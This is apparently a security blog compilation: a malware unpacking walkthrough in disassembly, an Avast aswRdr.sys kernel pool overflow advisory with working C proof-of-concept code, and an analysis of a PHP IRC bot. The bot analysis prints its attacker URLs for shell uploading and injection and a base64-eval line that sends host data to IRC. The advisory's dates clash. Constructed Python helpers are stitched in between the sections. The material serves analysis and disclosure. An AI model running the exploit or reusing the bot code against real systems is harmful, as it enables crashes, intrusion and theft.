0040164E push edx
0040164F call loc_401000 ;Decodes a piece of code
00401654 add esp, 18h
..
0040167C push edx
0040167D call loc_401000 ;Decodes a piece of code
00401682 add esp, 18h

After the decoding function has been called approximately 6-7 times, we land here:

00401768 push 40h ;PAGE_EXECUTE_READWRITE
0040176A push 3000h ;3000h data block size
0040176F mov edx, [ebp-28h]
00401772 add edx, [ebp-254h]
00401778 add edx, [ebp-24h]
0040177B push edx
0040177C push 0
0040177E call ds:VirtualAlloc
00401784 mov [ebp-238h], eax ;Address of block data stored

As you should know, this allocates a block of memory that will be used as the location of the unpacked code;
indeed the page has EXECUTE rights (PAGE_EXECUTE_READWRITE).

004018A1 mov eax, [ebp-238h] ;Allocation Address in EAX (Destination)
004018A7 add eax, [ebp-14h]
004018AA mov ecx, [ebp-8] ;Source Address
004018AD mov dl, [ecx]
004018AF mov [eax], dl
004018B1 mov eax, [ebp-8]
..

After some iterations the destination is filled with the running code, and finally execution jumps
into it:

00401962 push edx
00401963 call dword ptr [ebp-264h] ;call Alloc_Address

And here we are In..

00370F50 PUSH EBP
00370F51 MOV EBP,ESP
00370F53 SUB ESP,1244
00370F59 CALL 00370F00
00370F5E MOV DWORD PTR SS:[EBP-11F0],EAX ; kernel32's address in stack
00370F64 CALL 00370F30
00370F69 MOV DWORD PTR SS:[EBP-1E8],EAX
00370F6F LEA EAX,[EBP-6C]

Inside CALL 00370F00

00370F04 MOV EAX,DWORD PTR FS:[18]
00370F0A MOV DWORD PTR SS:[EBP-4],EAX
00370F0D MOV EAX,DWORD PTR SS:[EBP-4]
00370F10 MOV ECX,DWORD PTR DS:[EAX+30]
00370F13 MOV EDX,DWORD PTR DS:[ECX+0C]
00370F16 MOV EAX,DWORD PTR DS:[EDX+1C]
00370F19 MOV ECX,DWORD PTR DS:[EAX]
00370F1B MOV EAX,DWORD PTR DS:[ECX+8] ; ASCII " %"
00370F1E MOV ESP,EBP
00370F20 POP EBP
00370F21 RETN

FS:[18] is the TIB (Thread Information Block) self-pointer; from there the code walks TIB+30 (the PEB),
PEB+0C (PEB_LDR_DATA) and Ldr+1C (InInitializationOrderModuleList), takes the second entry of that list and reads its DllBase at offset 8: on Windows XP that entry is kernel32.dll, so this routine locates the base address of kernel32.dll. Finally CALL 00370F30 uses the TIB in the same way to obtain ntdll's base address
and stores it on the stack.

00370F78 MOV BYTE PTR SS:[EBP-1C0],4C
00370F7F MOV BYTE PTR SS:[EBP-1BF],6F
00370F86 MOV BYTE PTR SS:[EBP-1BE],63
..

Byte by byte it builds some function names: LocalFree, VirtualFree, VirtualProtect, UnmapViewOfFile, GetModuleHandle, LoadResource, LockResource, FindResourceA, GetProcessHeap, RtlAllocateHeap.
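As an added example (not the post's code), a Python helper that recovers such stack strings from a debugger listing: the first three lines of the sample are the ones above, the remaining stores and their addresses are constructed so that they spell LocalFree and VirtualFree, with a gap between the two.

```python
import re
from typing import Dict, List, Tuple

# One immediate byte store to the frame, as printed by the debugger listing.
STACK_BYTE_RE = re.compile(
    r"MOV BYTE PTR SS:\[EBP-([0-9A-F]+)\],([0-9A-F]{1,2})\s*$", re.IGNORECASE
)


def parse_stack_writes(listing: str) -> List[Tuple[int, int]]:
    """Return (frame offset, byte value) pairs for every matching instruction."""
    writes = []
    for line in listing.splitlines():
        m = STACK_BYTE_RE.search(line)
        if m:
            writes.append((int(m.group(1), 16), int(m.group(2), 16)))
    return writes


def recover_stack_strings(listing: str) -> Dict[int, str]:
    """Group contiguous byte stores into ASCII strings keyed by their start offset.

    Stores are ordered by ascending address (i.e. descending EBP-offset); a gap in
    the addresses, a NUL or a non-printable byte terminates the current string.
    """
    writes = sorted(parse_stack_writes(listing), key=lambda w: -w[0])
    strings: Dict[int, str] = {}
    buf: List[int] = []
    start = prev_off = None
    for off, val in writes:
        if prev_off is not None and off != prev_off - 1 and buf:
            strings[start] = bytes(buf).decode("ascii")   # address gap
            buf = []
        prev_off = off
        if val == 0 or not 0x20 <= val < 0x7F:
            if buf:
                strings[start] = bytes(buf).decode("ascii")  # terminator
                buf = []
            continue
        if not buf:
            start = off
        buf.append(val)
    if buf:
        strings[start] = bytes(buf).decode("ascii")
    return strings


# Constructed listing: the three stores shown in the post, then constructed
# stores (7-byte instructions, hence the address stride) for the rest of
# "LocalFree", a gap, and "VirtualFree". The last line must be ignored.
SAMPLE_LISTING = """
00370F78 MOV BYTE PTR SS:[EBP-1C0],4C
00370F7F MOV BYTE PTR SS:[EBP-1BF],6F
00370F86 MOV BYTE PTR SS:[EBP-1BE],63
00370F8D MOV BYTE PTR SS:[EBP-1BD],61
00370F94 MOV BYTE PTR SS:[EBP-1BC],6C
00370F9B MOV BYTE PTR SS:[EBP-1BB],46
00370FA2 MOV BYTE PTR SS:[EBP-1BA],72
00370FA9 MOV BYTE PTR SS:[EBP-1B9],65
00370FB0 MOV BYTE PTR SS:[EBP-1B8],65
00370FB7 MOV BYTE PTR SS:[EBP-1B7],0
00370FBE MOV BYTE PTR SS:[EBP-1B0],56
00370FC5 MOV BYTE PTR SS:[EBP-1AF],69
00370FCC MOV BYTE PTR SS:[EBP-1AE],72
00370FD3 MOV BYTE PTR SS:[EBP-1AD],74
00370FDA MOV BYTE PTR SS:[EBP-1AC],75
00370FE1 MOV BYTE PTR SS:[EBP-1AB],61
00370FE8 MOV BYTE PTR SS:[EBP-1AA],6C
00370FEF MOV BYTE PTR SS:[EBP-1A9],46
00370FF6 MOV BYTE PTR SS:[EBP-1A8],72
00370FFD MOV BYTE PTR SS:[EBP-1A7],65
00371004 MOV BYTE PTR SS:[EBP-1A6],65
0037100B MOV BYTE PTR SS:[EBP-1A5],0
00371012 MOV DWORD PTR SS:[EBP-1C4],0
"""

if __name__ == "__main__":
    for off, text in sorted(recover_stack_strings(SAMPLE_LISTING).items(), reverse=True):
        print(f"[EBP-{off:X}] {text}")
```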

The next step is to resolve the function names just built into addresses by walking the export table of the module:

00370149 8B55 F4 MOV EDX,DWORD PTR SS:[EBP-0C]
0037014C 83C2 01 ADD EDX,1
0037014F 8955 F4 MOV DWORD PTR SS:[EBP-0C],EDX
00370152 8B45 F0 MOV EAX,DWORD PTR SS:[EBP-10]
00370155 8B4D F4 MOV ECX,DWORD PTR SS:[EBP-0C]
00370158 3B48 18 CMP ECX,DWORD PTR DS:[EAX+18]
0037015B 7D 5A JGE SHORT 003701B7
0037015D 8B55 F0 MOV EDX,DWORD PTR SS:[EBP-10]
00370160 8B45 08 MOV EAX,DWORD PTR SS:[EBP+8]
00370163 0342 20 ADD EAX,DWORD PTR DS:[EDX+20]
00370166 8B4D F4 MOV ECX,DWORD PTR SS:[EBP-0C]
00370169 8B55 08 MOV EDX,DWORD PTR SS:[EBP+8]
0037016C 031488 ADD EDX,DWORD PTR DS:[ECX*4+EAX]
0037016F 8955 EC MOV DWORD PTR SS:[EBP-14],EDX
00370172 8B45 F0 MOV EAX,DWORD PTR SS:[EBP-10]
00370175 8B4D 08 MOV ECX,DWORD PTR SS:[EBP+8]
00370178 0348 24 ADD ECX,DWORD PTR DS:[EAX+24]
0037017B 8B55 F4 MOV EDX,DWORD PTR SS:[EBP-0C]
0037017E 66:8B0451 MOV AX,WORD PTR DS:[EDX*2+ECX]
00370182 66:8945 FC MOV WORD PTR SS:[EBP-4],AX
00370186 8B4D F0 MOV ECX,DWORD PTR SS:[EBP-10]
00370189 8B55 08 MOV EDX,DWORD PTR SS:[EBP+8]
0037018C 0351 1C ADD EDX,DWORD PTR DS:[ECX+1C]
0037018F 0FB745 FC MOVZX EAX,WORD PTR SS:[EBP-4]
00370193 8B4D 08 MOV ECX,DWORD PTR SS:[EBP+8]
00370196 030C82 ADD ECX,DWORD PTR DS:[EAX*4+EDX]
00370199 894D F8 MOV DWORD PTR SS:[EBP-8],ECX
0037019C 8B55 EC MOV EDX,DWORD PTR SS:[EBP-14]
0037019F 52 PUSH EDX
003701A0 8B45 0C MOV EAX,DWORD PTR SS:[EBP+0C]
003701A3 50 PUSH EAX
003701A4 E8 57FEFFFF CALL 00370000 ;From Name to Address
003701A9 83C4 08 ADD ESP,8
003701AC 85C0 TEST EAX,EAX
003701AE 75 05 JNE SHORT 003701B5
003701B0 8B45 F8 MOV EAX,DWORD PTR SS:[EBP-8]
003701B3 EB 04 JMP SHORT 003701B9
003701B5 ^ EB 92 JMP SHORT 00370149
003701B7 33C0 XOR EAX,EAX
003701B9 8BE5 MOV ESP,EBP
003701BB 5D POP EBP
003701BC C3 RETN

This piece of code walks the module's export directory: for each name index it reads the name pointer from AddressOfNames (+20), the corresponding ordinal from AddressOfNameOrdinals (+24) and the function RVA from AddressOfFunctions (+1C), stopping at NumberOfNames (+18); CALL 00370000 compares the exported name with the wanted one and returns 0 on a match, in which case the resolved address (EBP-8) is returned. This is the classical way to retrieve a function's address from its name without calling GetProcAddress.
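As an added example (not code from the post or from the malware), the same export-directory walk in Python, run against a constructed minimal module image so the ordinal indirection can be checked. The field offsets are those of IMAGE_EXPORT_DIRECTORY used by the listing; the layout of the fake image is an assumption.

```python
import struct
from typing import Optional

# IMAGE_EXPORT_DIRECTORY field offsets, the same constants the loader stub uses.
NUMBER_OF_NAMES = 0x18
ADDRESS_OF_FUNCTIONS = 0x1C
ADDRESS_OF_NAMES = 0x20
ADDRESS_OF_NAME_ORDINALS = 0x24


def _u32(image: bytes, off: int) -> int:
    return struct.unpack_from("<I", image, off)[0]


def _u16(image: bytes, off: int) -> int:
    return struct.unpack_from("<H", image, off)[0]


def _cstr(image: bytes, off: int) -> bytes:
    return image[off:image.index(b"\x00", off)]


def resolve_export(image: bytes, export_dir: int, wanted: bytes) -> Optional[int]:
    """Return the RVA of exported function `wanted`, or None if it is not exported.

    `image` is a mapped module (offset 0 == image base, so RVA == offset) and
    `export_dir` the RVA of its IMAGE_EXPORT_DIRECTORY. The loop mirrors the stub:
    index the name table, take the matching ordinal, index the function table.
    Out-of-range tables raise struct.error here instead of reading garbage.
    """
    count = _u32(image, export_dir + NUMBER_OF_NAMES)
    functions = _u32(image, export_dir + ADDRESS_OF_FUNCTIONS)
    names = _u32(image, export_dir + ADDRESS_OF_NAMES)
    ordinals = _u32(image, export_dir + ADDRESS_OF_NAME_ORDINALS)
    for i in range(count):
        if _cstr(image, _u32(image, names + 4 * i)) != wanted:
            continue
        ordinal = _u16(image, ordinals + 2 * i)
        return _u32(image, functions + 4 * ordinal)
    return None


def build_sample_image() -> bytes:
    """Construct a minimal fake module with a three-entry export directory.

    Layout (all values constructed): export directory at 0x100, function table at
    0x200, name table at 0x240, ordinal table at 0x280, name strings from 0x300.
    The ordinal table is deliberately not the identity, so a correct walk must go
    through it rather than indexing the function table by name index.
    """
    image = bytearray(0x400)
    names = [b"LocalFree", b"VirtualProtect", b"VirtualAlloc"]
    func_rvas = [0x1000, 0x2000, 0x3000]   # functions[0..2]
    ordinals = [2, 0, 1]                    # name i -> functions[ordinals[i]]
    struct.pack_into("<I", image, 0x100 + NUMBER_OF_NAMES, len(names))
    struct.pack_into("<I", image, 0x100 + ADDRESS_OF_FUNCTIONS, 0x200)
    struct.pack_into("<I", image, 0x100 + ADDRESS_OF_NAMES, 0x240)
    struct.pack_into("<I", image, 0x100 + ADDRESS_OF_NAME_ORDINALS, 0x280)
    str_off = 0x300
    for i, name in enumerate(names):
        struct.pack_into("<I", image, 0x200 + 4 * i, func_rvas[i])
        struct.pack_into("<I", image, 0x240 + 4 * i, str_off)
        struct.pack_into("<H", image, 0x280 + 2 * i, ordinals[i])
        image[str_off:str_off + len(name)] = name
        str_off += len(name) + 1            # leave the NUL terminator in place
    return bytes(image)


if __name__ == "__main__":
    img = build_sample_image()
    for fn in (b"LocalFree", b"VirtualProtect", b"VirtualAlloc", b"GetProcessHeap"):
        print(fn.decode(), "->", resolve_export(img, 0x100, fn))
```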

003716B7 PUSH 0
003716B9 MOV EAX,DWORD PTR SS:[EBP-12C]
003716BF MOV ECX,DWORD PTR DS:[EAX+30]
003716C2 CALL ECX ;GetModuleHandle
..
003717CB MOV ECX,DWORD PTR SS:[EBP-12C]
003717D1 MOV EDX,DWORD PTR DS:[ECX+14]
003717D4 CALL EDX ;VirtualProtect
003717D6 MOV EAX,DWORD PTR SS:[EBP-0BC]
003717DC MOV DWORD PTR SS:[EBP-24],EAX

Avast aswRdr.sys Kernel Pool Corruption and Local Privilege Escalation

=============[Avast aswRdr.sys Kernel Pool Corruption and Local Privilege Escalation]================

Author(s): Giuseppe 'Evilcry' Bonfa'
AbdulAziz Hariri

E-Mail: evilcry {AT} GMAIL {DOT} COM
Website: http://evilcry.netsons.org
http://www.insight-tech.org
http://evilcodecave.blogspot.com
http://evilcodecave.wordpress.com


Copyright 2009 Giuseppe Bonfa'. All rights reserved.


***Disclosure Timeline***

Discover Date: -
PoC Code: porting C++ 26/09/2009
Vendor Notify: 26/09/2009
Vendor Reply: 15/09/2009
Vendor Fix: 15/10/2009

======================
Product Details:
======================

Affected Product: Avast antivirus (other versions could be affected)
Product Version: 4.8.1356.0
Vulnerable Component: aswRdr.sys 4.8.1356.0 (avast! TDI RDR Driver)
Category: Local Denial of Service due to kernel memory corruption (BSOD)
(untested) Local Privilege Escalation

Notes: Tested on XP Sp0-Sp2 fixed faulting process IExplorer 6

======================
Vulnerability Details:
======================

Avast's aswRdr.sys driver does not sanitize user-supplied input (passed
via IOCTL), and this leads to a kernel heap overflow that propagates
through the system as a BSOD, with a potential risk of privilege escalation.

==================
Technical Details:
==================

kd> !analyze -v

Bugcheck: BAD_POOL_HEADER

Arg1: 00000020, a pool block header size is corrupt.
Arg2: 8136c618, The pool entry we were looking for within the page.
Arg3: 8136c778, The next pool entry. <-- OVERWRITTEN HEADER
Arg4: 1a2c0001, (reserved)

POOL_ADDRESS: unable to get nt!MmSpecialPoolStart
unable to get nt!MmSpecialPoolEnd
unable to get nt!MmPoolCodeStart
unable to get nt!MmPoolCodeEnd
8136c618

STACK_TEXT:
WARNING: Stack unwind information not available. Following frames may be
wrong.
f7c70a18 80543c86 00000019 00000020 8136c618 nt+0x21925
f7c70a68 804f388c 8136c620 00000000 81571de8 nt+0x6cc86
f7c70abc 804fcfbf 81571de8 f7c70b08 f7c70afc nt+0x1c88c
f7c70b0c 806d1c35 00000000 00000000 f7c70b24 nt+0x25fbf
f7c70b24 806d1861 badb0d00 00000000 81603548 hal+0x2c35
f7c70bb4 804f0498 81571de8 81348028 00000000 hal+0x2861
f7c70be8 f76ee9ad 81347ec8 81565740 00000000 nt+0x19498
f7c70c1c f76ee333 81347ec8 81571da8 81664e28 aswRdr+0x9ad
f7c70c58 805749d1 81347ec8 81571da8 81348028 aswRdr+0x333
f7c70d00 8056d33c 0000001c 00000000 00000000 nt+0x9d9d1
f7c70d34 8053c808 0000001c 00000000 00000000 nt+0x9633c
f7c70d64 7c91eb94 badb0d00 0012fee0 04040404 nt+0x65808
f7c70d68 badb0d00 0012fee0 04040404 04040404 0x7c91eb94
f7c70d6c 0012fee0 04040404 04040404 00000000 0xbadb0d00
f7c70d70 04040404 04040404 00000000 00000000 0x12fee0
f7c70d74 04040404 00000000 00000000 00000000 0x4040404
f7c70d78 00000000 00000000 00000000 00000000 0x4040404


==================
Proof of Concept:
==================

Exploitation for privilege escalation is not trivial, but possible.


+---------------------------------------------------------------------------+
/* Avast 4.8.1356.0 antivirus aswRdr.sys Kernel Pool Corruption
*
* Author(s): Giuseppe 'Evilcry' Bonfa'
* AbdulAziz Hariri
* E-Mail: evilcry _AT_ gmail _DOT_ com
* Website: http://evilcry.netsons.org
* http://evilcodecave.blogspot.com
* http://evilcodecave.wordpress.com
* http://evilfingers.com
*
* Disclosure Timeline: As specified in the Advisory.
*/

#define WIN32_LEAN_AND_MEAN
#include <windows.h>
#include <stdio.h>


BOOL OpenDevice(PWSTR DriverName, HANDLE *lphDevice) //taken from esagelab
{
WCHAR DeviceName[MAX_PATH];
HANDLE hDevice;

if ((GetVersion() & 0xFF) >= 5)
{
wcscpy(DeviceName, L"\\\\.\\Global\\");
}
else
{
wcscpy(DeviceName, L"\\\\.\\");
}

wcscat(DeviceName, DriverName);

printf("Opening.. %S\n", DeviceName);

hDevice = CreateFileW(DeviceName, GENERIC_READ | GENERIC_WRITE, 0,
NULL, OPEN_EXISTING,
FILE_ATTRIBUTE_NORMAL, NULL);

if (hDevice == INVALID_HANDLE_VALUE)
{
printf("CreateFile() ERROR %d\n", GetLastError());
return FALSE;
}

*lphDevice = hDevice;

return TRUE;
}

int main()
{
HANDLE hDev = NULL;
DWORD Junk;

if(!OpenDevice(L"aswRDR",&hDev))
{
printf("Unable to access aswRdr\n");
return(0);
}

char *Buff = (char *)VirtualAlloc(NULL, 0x156, MEM_RESERVE |
MEM_COMMIT, PAGE_EXECUTE_READWRITE);

if (Buff)
{
memset(Buff, 'A', 0x156); // 0x156 bytes of 'A', the size that triggers the BAD_POOL_HEADER bugcheck above

// IOCTL 0x80002024 is METHOD_BUFFERED: the input lands in the IRP's SystemBuffer
// with InputBufferLength = 0x156, which the driver does not validate
DeviceIoControl(hDev,0x80002024,Buff,0x156,Buff,0x156,&Junk,(LPOVERLAPPED)NULL);
printf("DeviceIoControl Executed..\n");
}
else
{
printf("VirtualAlloc() ERROR %d\n", GetLastError());
}


return(0);
}
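To make the bug class concrete, here is an added example (written for this page, not the advisory's or the driver's code): a user-mode Python model of an IOCTL handler that copies InputBufferLength bytes into a fixed-size pool block, next to the length check that closes the hole, plus the CTL_CODE decomposition of 0x80002024. The pool layout, header bytes, tags and the 0x40-byte request size are assumptions; only the IOCTL code and the 0x156-byte buffer of 'A' come from the PoC above.

```python
"""Added example, not part of the advisory or of aswRdr.sys: a user-mode model
of an IOCTL handler that trusts InputBufferLength, beside the check that fixes
it. Sizes, tags and header layout are constructed; the IOCTL code and the
0x156-byte 'A' buffer are the ones used by the PoC."""

POOL_HDR_SIZE = 8          # a 32-bit XP POOL_HEADER is 8 bytes
REQ_SIZE = 0x40            # assumed size of the request structure the handler expects
POOL_SIZE = 0x400          # size of the simulated pool region
NEXT_HDR_OFF = POOL_HDR_SIZE + REQ_SIZE                       # header of the neighbouring block
NEXT_HDR_GOOD = bytes([0x09, 0x00, 0x20, 0x00]) + b"Next"    # constructed size fields + tag
IOCTL_RDR = 0x80002024                                        # code sent by the PoC


def decode_ctl_code(code):
    """Split a CTL_CODE into (DeviceType, Function, Method, Access)."""
    return (code >> 16) & 0xFFFF, (code >> 2) & 0xFFF, code & 0x3, (code >> 14) & 0x3


class SimPool:
    """[hdr A][body A = REQ_SIZE][hdr B][body B ...], back to back like the kernel pool."""

    def __init__(self):
        self.mem = bytearray(POOL_SIZE)
        self.mem[0:POOL_HDR_SIZE] = bytes([0x00, 0x00, 0x09, 0x00]) + b"Rdr_"
        self.mem[NEXT_HDR_OFF:NEXT_HDR_OFF + POOL_HDR_SIZE] = NEXT_HDR_GOOD

    def next_header(self):
        return bytes(self.mem[NEXT_HDR_OFF:NEXT_HDR_OFF + POOL_HDR_SIZE])

    def next_header_intact(self):
        """The consistency check the pool allocator performs before raising BAD_POOL_HEADER."""
        return self.next_header() == NEXT_HDR_GOOD


def vulnerable_ioctl(pool, code, in_buf):
    """Trusts InputBufferLength: anything longer than REQ_SIZE runs into header B."""
    if code != IOCTL_RDR:
        return "STATUS_INVALID_DEVICE_REQUEST"
    end = POOL_HDR_SIZE + len(in_buf)
    if end > POOL_SIZE:
        raise ValueError("input exceeds the simulated pool region")   # limit of the model only
    pool.mem[POOL_HDR_SIZE:end] = in_buf
    return "STATUS_SUCCESS"


def hardened_ioctl(pool, code, in_buf):
    """Validates the length against the expected structure before touching the pool."""
    if code != IOCTL_RDR:
        return "STATUS_INVALID_DEVICE_REQUEST"
    if len(in_buf) < REQ_SIZE:
        return "STATUS_BUFFER_TOO_SMALL"
    if len(in_buf) != REQ_SIZE:
        return "STATUS_INVALID_PARAMETER"
    pool.mem[POOL_HDR_SIZE:POOL_HDR_SIZE + REQ_SIZE] = in_buf
    return "STATUS_SUCCESS"


def run(handler, length):
    """Send `length` bytes of 'A' (as the PoC does); return (status, next header intact)."""
    pool = SimPool()
    status = handler(pool, IOCTL_RDR, b"A" * length)
    return status, pool.next_header_intact()


if __name__ == "__main__":
    print("IOCTL 0x%x -> DeviceType 0x%x, Function 0x%x, Method %d, Access %d"
          % ((IOCTL_RDR,) + decode_ctl_code(IOCTL_RDR)))
    for name, handler in (("vulnerable", vulnerable_ioctl), ("hardened", hardened_ioctl)):
        for n in (REQ_SIZE, 0x156):
            status, ok = run(handler, n)
            print(f"{name:10s} InputBufferLength=0x{n:x}: {status}, "
                  f"next pool header {'intact' if ok else 'CORRUPTED'}")
```

Run it and the vulnerable handler reports STATUS_SUCCESS while the neighbouring pool header now reads "AAAAAAAA", the state the allocator later trips over and reports as BAD_POOL_HEADER (arg 3, the next pool entry); the hardened handler refuses the request before touching the pool. In a real WDM driver the same check compares IrpSp->Parameters.DeviceIoControl.InputBufferLength against the size of the expected structure before any copy.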


========
Credits:
========

Vulnerability found and advisory written by Giuseppe 'Evilcry' Bonfa'
and AbdulAziz Hariri.

===========
Disclaimer:
===========

The information within this advisory may change without notice. Use
of this information constitutes acceptance for use in an AS IS
condition. There are no warranties, implied or express, with regard
to this information. In no event shall the author be liable for any
direct or indirect damages whatsoever arising out of or in connection
with the use or spread of this information. Any use of this
information is at the user's own risk.


Regards,
Giuseppe

Friday, 13 November 2009

PHPSpyScanBot Analysis

Hi,

Again a PHP infection; this time we are going to see how PHPSpyScanBot works. The sample was found at
http://******.fileave.com/1.txt

/******************************************
/* FeeLCoMz AI PHPSpyScanBot v1.8 *
/* By FaTaLisTiCz_Fx *
/* Copyleft Mei 2008 *
/* #CyBeRz #Javahack @ irc.allnetwork.org *
/******************************************
*/

The entire code is placed in a single function, hajar().

Initially we have the list of IRC channels used by SpyScanBot:

function hajar() {
$versi = "v1.8";
//Configuration
$channels = '#bjork #gbc #g15 #scanner #Xd #bozot #ucid4 #sky #google #rose_banditz #jember #komputek #surabaya #shopping #online #on #monjali #manado #kill-9 #liqo #kotamobagu #indohacher #izel #checking #ccvalid #chking #chkbot #hn-community #eni #rose_banditz #blackhole #balihack #tauanzao #aku #aff #anakbugis #armin #butonhackerlink #bombat #web4cc #cc2bank #chk #dead #computer #check #chkon #dcc #efe #free #gorontalo';

Next there is a list of configuration settings, such as

$spyscan = TRUE; //TRUE, search. FALSE, stay quiet.
$myinject = 'http://uaedesign.com/cyberz.txt?';
$myid = 'http://legalref.ru/cyberz/id.txt?';
$mylogger = 'http://legalref.ru/cyberz/logs/fxscanlogger.php?';
$myshelluploader = 'http://legalref.ru/cyberz/uploadshell.txt?';
$mypsyinstaller = 'http://legalref.ru/cyberz/installpsy.txt?';
$mytargetlog = 'http://h1.ripway.com/gaboek/target.txt';

These six variables point to further files hosted on various servers, which provide the
following functionalities:
  1. ID tracker ($myid)
  2. Logging ($mylogger)
  3. Shell uploader ($myshelluploader)
  4. psyBNC installer ($mypsyinstaller)
  5. List of targets ($mytargetlog)
  6. Injector ($myinject)
Then an array of URLs is built:

$targetlist = array();
$targetok = array();
$gantilist = array(
'http://h1.ripway.com/bsnet/a.txt?',
'http://83.222.131.90/~legitimi/mybase/r57.txt?',
'http://politics.wwf.gr/help/css/faq.txt?',
'http://master/admin/c99/text??',
'http://www.preman.com/galee??',
'http://Preman-crew.gila/kill.txt??',
'http://h1.ripway.com/rebrov/leonardo.txt?',
'sempakakaka???',
'http://municoinco.cl/weba/asu.txt??',
'http://cuteonlinegames.com/r57.txt?',
'http://xiki.net/test.txt?',
'http://fuck.u/box?????',
);

It's interesting to see that these links point to the most famous PHP shell kits:
  1. r57
  2. c99
  3. etc..
There is also an ignore list, like this:

$scanlist = array('http','ftp');
$ignorelist = array(
'.detik',
'/accesswatch-1.32/',
'/aws/',
'/bugtraq/',
'/count/full.php/',
..and so on..

$nicklist = array(
"kibba","suci","marni","sumar","sukar",
"sobiri","munif","wantini","poniman","siti","anis",
"dangkel","mahmod"
);
$identify = "password"; //Password Nick Bot
$identlist = array(
"aL-hud","aL-hud","aL-hud","aL-hud","aL-hud",
"aL-hud","aL-hud","aL-hud","aL-hud","aL-hud","aL-hud","aL-hud",
);

From these we can extract the NickServ password, the allowed nicks and the ident.

if ($localtest == 1) { $remotehost2 = array("localhost"); }
else { $remotehost2 = array("irc.mildnet.org"); }
$port = "6667";
$quitmsglist = array("Shutting Down","Fatal Error","Undefined Function",
"Turn off","Wrong Command");

irc.mildnet.org on port 6667 is used.

And here is an interesting piece of information for an in-depth analysis:

$admin = 'paijow';
$bot_password = 'temi'; //Password for bot auth

Let's now see the functionalities of this bot by reading its help list:

  • auth - Log in to the bot
  • deauth - Log out from the bot
  • pass - Set the bot password
  • chgpass - Change the bot password
  • adduser - Add a bot master/user
  • deluser - Remove a bot master/user
  • `auth - Your status in the channel (Channel)
  • !auth - Your authorization status
  • !msg - Send a message
  • !notice - Send a notice
  • !cycle - Hop (part and rejoin) the channel (Channel) (Admin/Master)
  • !join - Join a channel (Admin/Master)
  • !part [channel] [reason] - Part from a channel (Admin)
  • !botnick - Change nick (Admin/Master)
  • !away [reason]  - Set the nick away
  • !chanlist - View the bot's channel list
  • !userlist - View the user list
  • !quit [message] - Quit from IRC (Admin)
  • !vhost [vhost] - Change the vhost
  • !jump [server] - Change the bot's server
  • !help - View help (Query)
  • .: Public Commands :.
  • !urlenc | !urldec - URL encoder/decoder
  • !b64enc | !b64dec - Base64 encoder/decoder
  • !tes - View target info
  • .: Core Commands :.
  • !start - Activate SpyBot
  • !stop - Deactivate SpyBot
  • !scan - Scan in the Scanner channel
  • !scan - Add/remove/view the scan trigger list
  • !ignore - Add to the ignore list
  • !delignore - Remove from the ignore list
  • !ignorelist - View the ignore list
  • !ganti - Add to the list of injects to be replaced
  • !delganti - Remove from the replace list
  • !gantilist - View the list of replaced injects
  • !tanam - Upload a shell to the target (Admin/Master)
  • !status - View the current status
  • .: Admin Core Commands :.
  • !target - Targets found by the bot
  • !raw - Send a raw IRC command
  • !eval - Execute PHP code on the bot
Functionalities can be divided in
  • Common Functionalities
  • Public Functionalities
  • Scan Functionalities
  • Admin Functionalities
This is how the connection is performed, a classic retry loop with echo output:

echo "";
echo "Connecting to $remotehost...";
do {
$fp = fsockopen($remotehost,$port, $err_num, $err_msg, 60);
//If the connection fails
if(!$fp) {
if ( $counterfp <= 200 ) { $counterfp = $counterfp + 1; hajar(); } else { echo "
Can't connect to $remotehost! Try another server by refreshing your browser!";
$keluar = 1;
exit;
}
}

Registration with the IRC server follows:

$header = 'NICK '.$nick . CRL;
$header .= 'USER '.$username.' '.$localhost.' '.$remotehost.' :'.$realname . CRL;
fputs($fp, $header);
$response = '';

Then, once the expected server reply arrives, the bot identifies to NickServ, notifies the admin and joins a hidden channel:

fputs($fp, 'PRIVMSG nickserv :identify '.$nick.' '.$identify.CRL);
if ($nickmode) { fputs($fp, 'MODE '.$nick.' :'.$nickmode.CRL); }
/*** Notice Bot Admin ***/
fputs($fp, 'NOTICE ' . $admin . ' :BozZ..!'.CRL);
fputs($fp, base64_decode("Sk9JTiAjRmVlTENvTXo=").CRL);

Decoding the base64 string gives JOIN #FeeLCoMz, the default channel.
Command parsing is done in this way:

elseif ($dcom[0]=='PRIVMSG') {
$pesan = ltrim($iText,":");
$pesanlo = strtolower($pesan);
$com = explode(' ',$pesan);
$chan = strtolower($dcom[1]);

Now let's see the most interesting commands.

elseif ($com[3]==': INFO ') {
eval(base64_decode("JGJob3N0ID0gJF9TRVJWRVJbJ0hUVFBfSE9TVCddOyRiaXAgPSAk
X1NFUlZFUlsnU0VSVkVSX0FERFInXTskYnBocCAgPSAkX1NFUlZFUlsnUEhQX1NFTEY
nXTskYnJ1cmkgPSAkX1NFUlZFUlsnUkVRVUVTVF9VUkknXTskYnJpcCA9ICRfU0VSVk
VSWydSRU1PVEVfQUREUiddO2ZwdXRzKCRmcCwiUFJJVk1TRyAjRmVlTENvTXogOkhv
c3Q6ICRiaG9zdCB8IFJlZmVyZXI6ICRicnVyaSB8IFNjcmlwdDogJGJwaHAgfCBJUDogJGJp
cCB8IE93bmVyIElQOiAkYnJpcCAiLiBDUkwpOw=="));

which, decoded, reports generic information about the infected host to the #FeeLCoMz channel:

$bhost = $_SERVER['HTTP_HOST'];$bip = $_SERVER['SERVER_ADDR'];$bphp = $_SERVER['PHP_SELF'];$bruri = $_SERVER['REQUEST_URI'];$brip = $_SERVER['REMOTE_ADDR'];fputs($fp,"PRIVMSG #FeeLCoMz :Host: $bhost | Referer: $bruri | Script: $bphp | IP: $bip | Owner IP: $brip ". CRL);

Core Commands

elseif ($com[3]==':!target' && $auth["$dNick"]["status"]=="Admin") {
if ($com[4]=='clear') {
unset($targetlist);
fputs($fp,'PRIVMSG '.$dNick.' : 4Daftar target dihapus!'. CRL);
}

This clears the target list.

elseif ($com[4]=='list') {
if (!empty($com[5])) { $sendnick = $com[5]; }
else { $sendnick = $dNick; }
fputs($fp,'PING 12886241614'. CRL);
$msgdelay = 0;
fputs($fp,'PRIVMSG '.$sendnick.' : 12[ Internal Target ('.count($targetlist).') ]'. CRL);
sort($targetlist);
foreach ($targetlist as $baris) {
$msgdelay++;
if($msgdelay >= 2) { sleep(3) ; $msgdelay = 0; }
fputs($fp,'PRIVMSG '.$sendnick.' :'.$baris. CRL);
}
fputs($fp,'PRIVMSG '.$sendnick.' : 12[ The End ]'. CRL);

This sends the target list, line by line, as private messages to the nick that requested it (or to the nick given as argument).

elseif ($com[4]=='total') {
fputs($fp,'PRIVMSG '.$dNick.' : 12Total Target Internal: '.count($targetlist). CRL);
}

This reports the target count.

elseif ($com[4]=='log') {
if (!empty($com[6])) { $sendnick = $com[6]; }
else { $sendnick = $dNick; }
